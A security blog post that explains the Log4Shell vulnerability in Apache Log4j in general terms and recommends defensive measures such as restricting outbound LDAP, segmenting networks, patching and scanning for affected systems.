log4shell (CVE-2021-44228) – what to do? – Tec-Bite IT-Security Blog

About the job

Once again, an IT vulnerability dominates the headlines in the media. When even regular daily newspapers write about it, the confusion usually becomes even greater. I would like to classify here how serious it really is and how one can or could protect oneself.

What happened?

A Remote Code Execution (RCE) was found in the Apache Log4j logging framework for Java. The vulnerability can be exploited comparatively very easily. The very wide distribution of Log4j in many projects makes the situation so bad. The framework is used in thousands of software projects. An attacker only needs to send a string to the application, which is then logged. The logging framework interprets this string and then connects to an LDAP(s) server and loads code from there.

Is it really that bad?

Basically, it is devastating that such a critical vulnerability (CVSS score 10/10) has gone undetected for 7 years in such a widely used framework. Unfortunately, it is not excluded that state actors have known about the vulnerability for a longer time and used it for attacks. The list of affected companies such as Google, Apple, or Cloudflare shows how widespread the framework is. Log4shell will probably reignite the discussion about security reviews of open-source software. To be fair, the big IT companies are already doing quite a bit, but obviously still not enough. This also raises the question of whether this should really be left to the big tech companies.

The good news is that if you had implemented basic protective measures, you are probably hardly affected by log4shell. However, this should not be misunderstood; the chance that the vulnerable component exists in your network is close to 100%. So you should identify and patch the relevant systems. Implementing some simple best practices prevents the active exploitation of the vulnerability.

How can I protect myself?

It is actually quite simple. Attackers have to load code via LDAP(s). This automatically means that if this is not possible, the vulnerability cannot be actively exploited. So those who do not expose their servers to the internet, or only via a proxy, can probably sleep much more peacefully. Those who want to expose their servers to the internet out of convenience should at least restrict protocols to HTTP(s). I really cannot think of any reason why a server should speak LDAP with the whole world. It is important that the firewall does not just have ports 80/443 open, but that the firewall also performs protocol detection. This ensures that a real HTTP session is running on port 80 and not LDAP.

A second attack vector runs via RMI (Remote Method Invocation). This can be used to execute vulnerable system code on another system. Network segmentation helps here above all. Usually, there is no reason why a system accessible from the internet should be able to communicate with other servers via RMI.

There are also some parameters that can be set on the affected systems to fix the problem. There is already a lot of information available online, so no more details here.

How do I identify vulnerable systems?

There are now quite good open-source scanners that search all Java libraries for the vulnerable Log4j versions. Customers are better off with a vulnerability management solution such as Tenable. They had a report in their inbox right after the weekend listing all affected systems. Perhaps now is the right time to test such a solution.

How do I recognize compromised systems?

Exploiting the vulnerability is comparatively easy to detect. There is already a lot of information available online about this as well. The easiest way is to search the logs of the affected systems. Alternatively, there are also freely available IOC (Indicator of Compromise) lists that can help.

Conclusion

Clearly, log4shell is a devastating vulnerability that will affect many companies. However, those who primarily followed best practices can probably sleep much more peacefully than others. Nevertheless, it is advisable to quickly identify the vulnerable systems and sustainably eliminate the problem.